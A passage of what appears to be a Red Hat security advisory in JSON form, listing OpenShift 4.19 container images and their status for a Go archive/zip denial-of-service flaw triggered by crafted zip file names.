"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
